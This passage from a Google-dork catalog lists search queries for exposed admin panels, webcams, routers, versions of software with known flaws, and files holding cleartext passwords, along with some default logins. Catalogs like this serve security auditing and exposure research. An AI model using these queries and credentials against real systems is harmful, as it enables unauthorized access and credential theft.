hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang=">, this link appeared; I clicked it and so I found unprotected dirs.
In hxxp://www.notsohappyserver.com/com/novell/webaccess/ there is a file called WebAccessUninstall.ini, and this file contains info like server names, installation paths and server context.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3Aservlet%2Fwebacc[url]] [[dork]inurl:servlet/webacc[dork]] [end][957]] [[start][958] [[title]"Web File Browser" "Use regular expression"[title]] [[descr]This asks Google to search for a PHP script used to manage files on a server. The script "Web File Browser" enables users to change files on the server. The script comes unprotected, which means that anyone who knows the exact path of the PHP file has admin access to the files on that server. [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][958]] [[start][959] [[title]intext:gmail invite intext:http://gmail.google.com/gmail/a[[title]] [[descr]This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding "+blog", "+livejournal", or "+forum".[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intext%3Agmail+invite+intext%3Ahttp%3A%2F%2Fgmail.google.com%2Fgmail%2Fa&btnG=Search[url]] [[dork]intext:gmail invite intext:http://gmail.google.com/gmail/a[dork]] [end][959]] [[start][960] [[title]filetype:cgi transcoder.cgi[[title]] [[descr]Digital video recorder by SnapStream. On misconfigured machines it is possible to stream video off these devices.[descr]] [[url]http://www.google.com/search?q=filetype:cgi+transcoder.cgi&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]filetype:cgi transcoder.cgi[dork]] [end][960]] [[start][961] [[title]intitle:"Setup Home" "You will need * log in before * * change * settings"[title]] [[descr]This should reveal Belkin routers. Interestingly, Belkin routers have remote administration on by default, and act as a web server for administration. 
Also by default, their password is blank (and the login page helpfuly informs the attacker of this).

Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Setup+Home%22+%22You+will+need+*+log+in+before+*+*+change+*+settings%22[url]] [[dork]intitle:"Setup Home" "You will need * log in before * * change * settings"[dork]] [end][961]] [[start][963] [[title]"Index of" rar r01 nfo Modified 2004[[title]] [[descr]New Warez Directory Lists[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][963]] [[start][964] [[title]intitle:"Network Print Server" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )[[title]] [[descr]Axis Network Print Server devices. This search has all the possible URLs (more than strictly needed), but those are added in case Google decides to index them in the future.[descr]] [[url]http://www.google.com/search?q=intitle:%22Network+Print+Server%22+filetype:shtm+(+inurl:u_printjobs+%7C+inurl:u_server+%7C+inurl:a_server+%7C+inurl:u_generalhelp+%7C+u_printjobs+)&num=100&hl=en&lr=&fi[url]] [[dork]intitle:"Network Print Server" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )[dork]] [end][964]] [[start][965] [[title]intitle:"Network Print Server" intext:"http://www.axis.com" filetype:shtm[[title]] [[descr]Axis Network Print Server devices (a better, shorter search).[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3A%22Network+Print+Server%22+intext%3A%22http%3A%2F%2Fwww.axis.com%22+filetype%3Ashtm[url]] [[dork]intitle:"Network Print Server" intext:"http://www.axis.com" filetype:shtm[dork]] [end][965]] [[start][968] [[title]"pcANYWHERE EXPRESS Java Client"[title]] [[descr]This search will reveal the Java script program that allows someone to access PC Anywhere from, well, anywhere!
This should primarily be considered as a front door, as most PC Anywhere servers are password protected. Still, this is extremely dangerous to have exposed to the web.[descr]] [[url]http://www.google.com/search?q=%22pcANYWHERE+EXPRESS+Java+Client%22[url]] [[dork]"pcANYWHERE EXPRESS Java Client"[dork]] [end][968]] [[start][969] [[title]inurl:"Activex/default.htm" "Demo"[title]] [[descr]This search will reveal the ActiveX plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a front door, as most PC Anywhere servers are password protected. Still, this is extremely dangerous to have exposed to the web.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%22Activex%2Fdefault.htm%22+%22Demo%22[url]] [[dork]inurl:"Activex/default.htm" "Demo"[dork]] [end][969]] [[start][970] [[title]intitle:"FTP root at"[title]] [[descr]This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22FTP+root+at%22[url]] [[dork]intitle:"FTP root at"[dork]] [end][970]] [[start][971] [[title]intitle:"VNC viewer for Java"[title]] [[descr]VNC (Virtual Network Computing) allows a PC to be controlled remotely over the Internet. These are password protected, but still shouldn't be allowed to be indexed by Google by accident.[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22VNC+viewer+for+Java%22[url]] [[dork]intitle:"VNC viewer for Java"[dork]] [end][971]] [[start][972] [[title]filetype:torrent torrent[[title]] [[descr]Torrent files.
Don't expect to find spectacular stuff with this kind of string; this just shows you can use Google for all kinds of filetypes, not just pdf or html.[descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Atorrent+torrent[url]] [[dork]filetype:torrent torrent[dork]] [end][972]] [[start][973] [[title]inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)[[title]] [[descr]Administration pages for CUPS, the Common UNIX Printing System. Most are password protected.[descr]] [[url]http://www.google.com/search?q=inurl:%22631/admin%22+(inurl:%22op%3D*%22)+%7C+(intitle:CUPS)+&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS) [dork]] [end][973]] [[start][975] [[title]W-Nailer Upload Area[[title]] [[descr]What is W-Nailer?

W-Nailer is a PHP script which can create galleries for you.
It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.

W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely web-based.
So after you have uploaded your files, you will just need your browser![descr]] [[url]http://www.google.com/search?q=uploadpics.php%3Fdid%3D+-forum[url]] [[dork]uploadpics.php?did= -forum[dork]] [end][975]] [[start][976] [[title]PHPhotoalbum Upload[[title]] [[descr]Homepage: http://www.stoverud.com/PHPhotoalbum/

PHPhotoalbum is a picture gallery script. You can upload pictures directly from your web browser. The script generates thumbnails on the fly. Users can comment on each picture. View statistics about the pictures. TopXX list. The admin user can delete pictures, comments and albums.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22PHPhotoalbum+-+Upload%22+%7C+inurl%3A%22PHPhotoalbum%2Fupload%22[url]] [[dork]intitle:"PHPhotoalbum - Upload" | inurl:"PHPhotoalbum/upload"[dork]] [end][976]] [[start][977] [[title]PHPhotoalbum Statistics[[title]] [[descr]PHPhotoalbum is a picture gallery script. You can upload pictures directly from your web browser. The script generates thumbnails on the fly. Users can comment on each picture. View statistics about the pictures. TopXX list. The admin user can delete pictures, comments and albums.[descr]] [[url]http://www.google.com/search?q=inurl%3APHPhotoalbum%2Fstatistics+intitle%3A%22PHPhotoalbum+-+Statistics%22[url]] [[dork]inurl:PHPhotoalbum/statistics intitle:"PHPhotoalbum - Statistics"[dork]] [end][977]] [[start][978] [[title]PhotoPost PHP Upload[[title]] [[descr]PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.

Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=-Login+inurl%3Aphotopost%2Fuploadphoto.php&btnG=Search[url]] [[dork]-Login inurl:photopost/uploadphoto.php[dork]] [end][978]] [[start][979] [[title]uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album[[title]] [[descr]Product: PHPix
Version: 1.0
Vuln: Directory traversal

PHPix is a Web-based photo album viewer written in PHP. It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read.


http://www.securiteam.com/unixfocus/6G00K0K04K.html[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][979]] [[start][980] [[title]XAMPP "inurl:xampp/index"[title]] [[descr]XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.

- allows you to write emails (Mercury Mail)
- some phpMyAdmin installs are unprotected
- security details of the server
- maybe some more things ;-)[descr]] [[url]http://www.google.com/search?client=safari&rls=en&q=XAMPP+%22inurl:xampp/index%22&ie=UTF-8&oe=UTF-8[url]] [[dork]XAMPP "inurl:xampp/index"[dork]] [end][980]] [[start][981] [[title]intitle:"Browser Launch Page"[title]] [[descr]An ActiveX-based webcam, so use MS IE.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][981]] [[start][982] [[title]intext:"Mail admins login here to administrate your domain."[title]] [[descr]Another way to locate Postfix admin logon pages.[descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%22Mail+admins+login+here+to+administrate+your+domain.%22[url]] [[dork]intext:"Mail admins login here to administrate your domain."[dork]] [end][982]] [[start][983] [[title]inurl:citrix/metaframexp/default/login.asp? ClientDetection=On[[title]] [[descr]Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to "published" folders, files, drives, and applications on the server and often the attached network. There is an XSS vulnerability in a widely used version of their Web Interface.

As reported on Securiteam.com:
http://www.securiteam.com/securitynews/6X0020K8VW.html

A simple test is included in the advisory.

[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Acitrix%2Fmetaframexp%2Fdefault%2Flogin.asp%3FClientDetection%3DOn&btnG=Google+Search[url]] [[dork]inurl:citrix/metaframexp/default/login.asp?ClientDetection=On[dork]] [end][983]] [[start][984] [[title]intitle:"welcome to arcserve 7.0 advanced edition"[title]] [[descr]No need to explain.. Arcserve 7.0 web interface!

http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1628[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22welcome+to+arcserve+7.0+advanced+edition%22[url]] [[dork]intitle:"welcome to arcserve 7.0 advanced edition"[dork]] [end][984]] [[start][985] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][985]] [[start][986] [[title]ext:txt inurl:dxdiag[[title]] [[descr]This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implications of this data, but I'll leave it to your imagination.[descr]] [[url]http://www.google.com/search?q=ext%3Atxt+inurl%3Adxdiag&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-GB:official[url]] [[dork]ext:txt inurl:dxdiag[dork]] [end][986]] [[start][989] [[title]inurl:"usysinfo?login=true"[title]] [[descr]Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It is also used to track hardware and software inventory, to update configurations, drivers, OS and applications, and to proactively monitor and correct fault conditions.

Dell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM).

Another possible search for this is:

"Log in." inurl:1311/servlet/[descr]] [[url]http://www.google.com/search?q=inurl%3A%22usysinfo%3Flogin%3Dtrue%22[url]] [[dork]inurl:"usysinfo?login=true"[dork]] [end][989]] [[start][990] [[title]inurl:"/NSearch/AdminServlet"[title]] [[descr]This search brings up results for Novell NetWare's Web Search Manager. At best the sites will be password protected; at worst the site will require no authentication, allowing full control over a site's 'virtual search servers'.[descr]] [[url]http://www.google.com/search?q=inurl:%22/NSearch/AdminServlet%22&filter=0[url]] [[dork]inurl:"/NSearch/AdminServlet"[dork]] [end][990]] [[start][991] [[title]"Netware * Home" inurl:nav.html[[title]] [[descr]Rather than submitting various searches for all kinds of NetWare-related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare-powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager![descr]] [[url]http://www.google.com/search?hl=en&q=%22Netware+*+Home%22+inurl%3Anav.html[url]] [[dork]"Netware * Home" inurl:nav.html[dork]] [end][991]] [[start][992] [[title]intext:"Error Message : Error loading required libraries."[title]] [[descr]This throws up pages which contain "CGI ERROR" reports - which include the file (and line number) of the error's occurrence, the version of Perl being used, detailed server information (of the form "Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26"), usernames, setup file names, form / query information, port and path information, etc.
Perfect for system profiling![descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%22Error+Message+%3A+Error+loading+required+libraries.%22[url]] [[dork]intext:"Error Message : Error loading required libraries."[dork]] [end][992]] [[start][993] [[title]ext:reg "username=*" putty[[title]] [[descr]PuTTY registry entries. They contain username and hostname pairs, as well as the type of session (sftp, xterm, etc).[descr]] [[url]http://www.google.com/search?num=50&q=ext%3Areg+%22username%3D*%22+putty[url]] [[dork]ext:reg "username=*" putty[dork]] [end][993]] [[start][994] [[title]allinurl:index.htm?cus?audio[[title]] [[descr]This will find webcams made by Sweex, Orite and others. Supports motion detection, FTP, SMTP and save to .avi. Needs ActiveX, so works for IE/Windows only.[descr]] [[url]http://www.google.com/search?&q=allinurl%3Aindex.htm%3Fcus%3Faudio[url]] [[dork]allinurl:index.htm?cus?audio[dork]] [end][994]] [[start][995] [[title]intitle:"edna:streaming mp3 server" -forums[[title]] [[descr]Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).

Stats pages were found (by klouw) with:

"edna:*" intitle:"edna: Site Statistics" [descr]] [[url]http://www.google.com/search?q=intitle%3A%22edna%3Astreaming+mp3+server%22+-forums[url]] [[dork]intitle:"edna:streaming mp3 server" -forums[dork]] [end][995]] [[start][996] [[title]intitle:"ePowerSwitch Login"[title]] [[descr]With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: it continually monitors whether the connected IP-based devices are still active, and it can automatically, without user input, reboot any crashed device.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22ePowerSwitch+Login%22&btnG=Search[url]] [[dork]intitle:"ePowerSwitch Login"[dork]] [end][996]] [[start][997] [[title]ext:ini Version=4.0.0.4 password[[title]] [[descr]The ServU FTP Daemon ini file contains settings and session information including usernames, passwords and more. This is a more specific search for ServU passwords based on a previous dork by Cybercide.[descr]] [[url]http://www.google.com/search?q=ext%3Aini+Version%3D4.0.0.4+password[url]] [[dork]ext:ini Version=4.0.0.4 password[dork]] [end][997]] [[start][998] [[title]inurl:orasso.wwsso_app_admin.ls_login[[title]] [[descr]Oracle provides a Single Sign-On solution which is quite widespread as it integrates quite seamlessly into existing applications (as Oracle says).
If the link itself shows an empty page, try the directory below. [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][998]] [[start][999] [[title]inurl:oraweb -site:oraweb.org[[title]] [[descr]Oracle administrators tend to name their servers ora* - maybe because they forget the name of their database all the time.
So the Oracle webserver is very often named oraweb.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Aoraweb+-site%3Aoraweb.org&btnG=Search[url]] [[dork]inurl:oraweb -site:oraweb.org[dork]] [end][999]] [[start][1000] [[title]intitle:Group-Office "Enter your username and password to login"[title]] [[descr]Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online. [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1000]] [[start][1001] [[title]inurl:"8003/Display?what="[title]] [[descr]Norton AntiVirus for Gateways
Easily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIP®, UUENCODE, and MIME formats. Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdate™, and generating reports.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1001]] [[start][1002] [[title]intitle:"EverFocus.EDSR.applet"[title]] [[descr]The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR. Moreover, the 16 & 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function. Existing multiplexers can be connected via a switch output. Alarms are managed via external alarm inputs and outputs.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22EverFocus.EDSR.applet%22[url]] [[dork]intitle:"EverFocus.EDSR.applet"[dork]] [end][1002]] [[start][1003] [[title]inurl:netscape.ini[[title]] [[descr]There's a bunch of interesting info in netscape.ini
1. Viewers: which multimedia viewers the firm or people are using
2. Cookies
3. Address Book
4. Mail - if POP3 is used you will see the login and password.
5. Java - will tell the attacker if his victim has Java enabled.
6. URL History - the last sites visited
URL_1=http://edtech.xxxx.fi/
URL_2=C:\Tx\ixxx_t3.htm
URL_3=http://www.xxx.com/welcome/
URL_4=http://xxx.netscape.com
7. User Trusted External Applications
[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1003]] [[start][1004] [[title]inurl:netscape.hst[[title]] [[descr]Netscape Bookmark List/History: so an attacker would be able to locate the bookmark and history list.[descr]] [[url]http://www.google.com/search?q=inurl%3Anetscape.hst+[url]] [[dork]inurl:netscape.hst [dork]] [end][1004]] [[start][1005] [[title]inurl:"bookmark.htm"[title]] [[descr]Bookmarks for Netscape and various other browsers.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22bookmark.htm%22[url]] [[dork]inurl:"bookmark.htm"[dork]] [end][1005]] [[start][1006] [[title]inurl:netscape.hst[[title]] [[descr]History for Netscape, so an attacker can read a user's browsing history.[descr]] [[url]http://www.google.com/search?q=inurl%3Anetscape.hst+[url]] [[dork]inurl:netscape.hst [dork]] [end][1006]] [[start][1009] [[title]"powered | performed by Beyond Security's Automated Scanning" -kazaa -example[[title]] [[descr]This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerable services at the attackee's site.

This dork was found by Jamuse. A cleanup was done by Wolveso.

Please note: both current (Feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. But you never know when Google might find some real ones to play with?![descr]] [[url]http://www.google.com/search?q=%22powered+%7C+performed+by+Beyond+Security%27s+Automated+Scanning%22+-kazaa+-example[url]] [[dork]"powered | performed by Beyond Security's Automated Scanning" -kazaa -example[dork]] [end][1009]] [[start][1012] [[title]intitle:"EpsonNet WebAssist Rev"[title]] [[descr]This reveals the Epson Web Assist page (internal to the machine).[descr]] [[url]http://www.google.com/search?q=intitle%3A%22EpsonNet+WebAssist+Rev%22[url]] [[dork]intitle:"EpsonNet WebAssist Rev"[dork]] [end][1012]] [[start][1013] [[title]"SquirrelMail version 1.4.4" inurl:src ext:php[[title]] [[descr]Date: Jan 30 2005
This search reveals src/webmail.php, which would allow a crafted URL to include a remote web page. This was assigned CAN-2005-0103 by Common Vulnerabilities and Exposures.
What can possibly be done:
* A possible cross site scripting issue exists in src/webmail.php that is only accessible when the PHP installation is running with register_globals set to On.
* A possible local file inclusion issue was uncovered by one of our developers involving custom preference handlers. This issue is only active if the PHP installation is running with register_globals set to On.
[descr]] [[url]http://www.google.com/search?q=%22SquirrelMail+version+1.4.4%22+inurl%3Asrc+ext%3Aphp[url]] [[dork]"SquirrelMail version 1.4.4" inurl:src ext:php[dork]] [end][1013]] [[start][1014] [[title]inurl:na_admin[[title]] [[descr]This searches for the admin pages for a "Network Appliance" box. An authenticated user could get access to their data - all of it, in fact up to hundreds of TB of it.

This is also part of CGI scanning tools like: http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db


[descr]] [[url]http://www.google.com/search?q=inurl%3Ana_admin[url]] [[dork]inurl:na_admin[dork]] [end][1014]] [[start][1015] [[title]intitle:"Connection Status" intext:"Current login"[title]] [[descr]This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web interface to the router also indicates the presence of a telnet interface to the router![descr]] [[url]http://www.google.com/search?q=intitle%3A%22Connection+Status%22+intext%3A%22Current+login%22[url]] [[dork]intitle:"Connection Status" intext:"Current login"[dork]] [end][1015]] [[start][1016] [[title]intitle:"welcome to netware *" -site:novell.com[title]] [[descr]Novell login portals offering various services: storage, printing, email or LDAP access.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22welcome+to+netware+*%22+-site%3Anovell.com[url]] [[dork]intitle:"welcome to netware *" -site:novell.com[dork]] [end][1016]] [[start][1017] [[title]intitle:"Brother" intext:"View Configuration" intext:"Brother Industries, Ltd."[title]] [[descr]Finds a real bunch of Brother printers.[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-50,GGLD:en&q=intitle%3A%22Brother%22+intext%3A%22View+Configuration%22+intext%3A%22Brother+Industries%2C+Ltd%2E%22[url]] [[dork]intitle:"Brother" intext:"View Configuration" intext:"Brother Industries, Ltd."[dork]] [end][1017]] [[start][1018] [[title]filetype:inc mysql_connect OR mysql_pconnect[[title]] [[descr]INC files have PHP code within them that contains unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff.
The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.[descr]] [[url]http://www.google.com/search?q=filetype%3Ainc+mysql_connect+OR+mysql_pconnect[url]] [[dork]filetype:inc mysql_connect OR mysql_pconnect[dork]] [end][1018]] [[start][1019] [[title]"IceWarp Web Mail 5.3.0" "Powered by IceWarp"[title]] [[descr]IceWarp Web Mail 5.3.0

Multiple cross-site scripting and HTML injection vulnerabilities.
http://www.securityfocus.com/bid/12396/[descr]] [[url]http://www.google.com/search?q=%22IceWarp+Web+Mail+5.3.0%22+%22Powered+by+IceWarp%22[url]] [[dork]"IceWarp Web Mail 5.3.0" "Powered by IceWarp"[dork]] [end][1019]] [[start][1020] [[title]"Powered by DUpaypal" -site:duware.com[title]] [[descr]Here is another DUware product, DUpaypal. Once you get hold of the database, it contains the admin username and password. The default, by the way, is admin/password.

The default location for the database is ../_private/DUpaypal.mdb[descr]] [[url]http://www.google.com/search?q=%22Powered+by+DUpaypal%22+-site%3Aduware.com&btnG=Search&hl=en&lr=&c2coff=1[url]] [[dork]"Powered by DUpaypal" -site:duware.com[dork]] [end][1020]] [[start][1032] [[title]-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp[[title]] [[descr]Scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open configuration files ;-)[descr]] [[url]http://www.google.com/search?q=-site%3Aphp.net+-%22The+PHP+Group%22+inurl%3Asource++inurl%3Aurl+ext%3ApHp[url]] [[dork]-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp[dork]] [end][1032]] [[start][1033] [[title]"Microsoft CRM : Unsupported Browser Version"[title]] [[descr]Microsoft CRM Login portal.
MS says:
Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. The ease of integration with Microsoft Office is of particular value—enabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality. [descr]] [[url]http://www.google.com/search?q=%22Microsoft+CRM+%3A+Unsupported+Browser+Version%22[url]] [[dork]"Microsoft CRM : Unsupported Browser Version"[dork]] [end][1033]] [[start][1034] [[title]intitle:"switch login" "IBM Fast Ethernet Desktop"[title]] [[descr]IBM 8275 Model 416 High Performance Ethernet Workgroup Switch[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22switch+login%22+%22IBM+Fast+Ethernet+Desktop%22&btnG=Search[url]] [[dork]intitle:"switch login" "IBM Fast Ethernet Desktop"[dork]] [end][1034]] [[start][1035] [[title]"Powered by Link Department"[title]] [[descr]Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.
Below the link list, a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data.
[descr]] [[url]http://www.google.com/search?q=%22Powered+by+Link+Department%22[url]] [[dork]"Powered by Link Department"[dork]] [end][1035]] [[start][1036] [[title]"Powered by MercuryBoard [v1"[title]] [[descr]Exploit for MercuryBoard:

http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0

Enter the following search:
"Powered by MercuryBoard [v1"

And the exploit does work![descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+MercuryBoard+%5Bv1%22&btnG=Search[url]] [[dork]"Powered by MercuryBoard [v1"[dork]] [end][1036]] [[start][1037] [[title]intitle:"Index of" sc_serv.conf sc_serv content[[title]] [[descr]This dork lists sc_serv.conf files. These files contain information for Shoutcast servers and often contain cleartext passwords.

Original dork: filetype:conf sc_serv.conf
Cleaned by: c0wz
Clean date: 2005-04-26
[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Index+of%22+sc_serv.conf+sc_serv++content[url]] [[dork]intitle:"Index of" sc_serv.conf sc_serv content[dork]] [end][1037]] [[start][1038] [[title]intitle:"welcome to mono xsp"[title]] [[descr]XSP is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22welcome+to+mono+xsp%22[url]] [[dork]intitle:"welcome to mono xsp"[dork]] [end][1038]] [[start][1039] [[title]intitle:"DEFAULT_CONFIG - HP"[title]] [[descr]Highly scalable Ethernet switches by HP running in the default configuration.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22DEFAULT_CONFIG+-+HP%22[url]] [[dork]intitle:"DEFAULT_CONFIG - HP"[dork]] [end][1039]] [[start][1040] [[title]intitle:"web server status" SSH Telnet[[title]] [[descr]Simple port scanners for the most common ports.[descr]] [[url]http://www.google.com/search?q=intitle:%22web+server+status%22+SSH+Telnet[url]] [[dork]intitle:"web server status" SSH Telnet[dork]] [end][1040]] [[start][1041] [[title] intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"[title]] [[descr]OpenGroupware is a comprehensive open source groupware project running on all major platforms.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1041]] [[start][1042] [[title]intitle:Linksys site:ourlinksys.com[[title]] [[descr]Ourlinksys.com DDNS entries pointing to Linksys web-enabled cameras.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3ALinksys+site%3Aourlinksys.com+&btnG=Search[url]] [[dork]intitle:Linksys site:ourlinksys.com [dork]] [end][1042]] [[start][1043] [[title]intitle:"supervisioncam protocol"[title]] [[descr]"SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. It starts optional activities when a movement is detected."
[descr]] [[url]http://www.google.com/search?q=intitle:%22supervisioncam+protocol%22[url]] [[dork]intitle:"supervisioncam protocol"[dork]] [end][1043]] [[start][1044] [[title]+"HSTSNR" -"netop.com"[title]] [[descr]This search reveals NetOp license files. From the NetOp website: "NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn’t terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console."[descr]] [[url]http://www.google.com/search?hl=en&q=%2B%22HSTSNR%22+-%22netop.com%22&btnG=Google+Search[url]] [[dork]+"HSTSNR" -"netop.com"[dork]] [end][1044]] [[start][1045] [[title]inurl:getmsg.html intitle:hotmail[[title]] [[descr]These pages contain Hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords.[descr]] [[url]http://www.google.com/search?q=inurl:getmsg.html+intitle:hotmail&ie=UTF-8&oe=UTF-8[url]] [[dork]inurl:getmsg.html intitle:hotmail[dork]] [end][1045]] [[start][1046] [[title]intext:"Please enter correct password for Administrator Access. Thank you" "Copyright © 2003 SMC Networks, Inc. All rights reserved."[title]] [[descr]Finds SMC routers.[descr]] [[url]http://www.google.com/search?q=intext%3A%22Please+enter+correct+password+for+Administrator+Access%2E+Thank+you%22+%22Copyright+%C2%A9+2003+SMC+Networks%2C+Inc%2E+All+rights+reserved%2E%22[url]] [[dork]intext:"Please enter correct password for Administrator Access. Thank you" "Copyright © 2003 SMC Networks, Inc. All rights reserved."[dork]] [end][1046]] [[start][1058] [[title]"delete entries" inurl:admin/delete.asp[[title]] [[descr]As described in OSVDB article #13715:

"AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity."

The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork.[descr]] [[url]http://www.google.com/search?q=%22delete+entries%22+inurl%3Aadmin%2Fdelete.asp[url]] [[dork]"delete entries" inurl:admin/delete.asp[dork]] [end][1058]] [[start][1059] [[title]inurl:camctrl.cgi[[title]] [[descr]Vivotek webcams.[descr]] [[url]http://www.google.com/search?q=inurl%3Acamctrl.cgi[url]] [[dork]inurl:camctrl.cgi[dork]] [end][1059]] [[start][1060] [[title]allintitle:Brains, Corp. camera[[title]] [[descr]mmEye webcam / cam server
mmEye is a multifunction multimedia server equipped with a 32-bit RISC CPU (SH-3), and runs the UNIX operating system (NetBSD).
